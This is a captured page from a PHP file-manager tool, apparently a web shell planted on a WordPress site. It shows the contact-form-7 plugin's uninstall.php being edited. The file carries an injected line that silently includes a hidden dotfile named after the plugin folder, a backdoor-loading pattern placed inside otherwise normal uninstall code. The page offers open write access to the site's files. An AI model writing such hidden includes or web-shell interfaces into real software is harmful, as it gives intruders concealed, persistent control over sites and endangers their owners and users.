📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 16:04:49
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
contact-form-7
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/contact-form-7
🔄 Refresh
✏️
Editing: uninstall.php
Writable
<?php if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { exit(); } if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function wpcf7_delete_plugin() { global $wpdb; delete_option( 'wpcf7' ); $posts = get_posts( array( 'numberposts' => -1, 'post_type' => 'wpcf7_contact_form', 'post_status' => 'any', ) ); foreach ( $posts as $post ) { wp_delete_post( $post->ID, true ); } $wpdb->query( sprintf( "DROP TABLE IF EXISTS %s", $wpdb->prefix . 'contact_form_7' ) ); } wpcf7_delete_plugin();
💾 Save Changes
❌ Cancel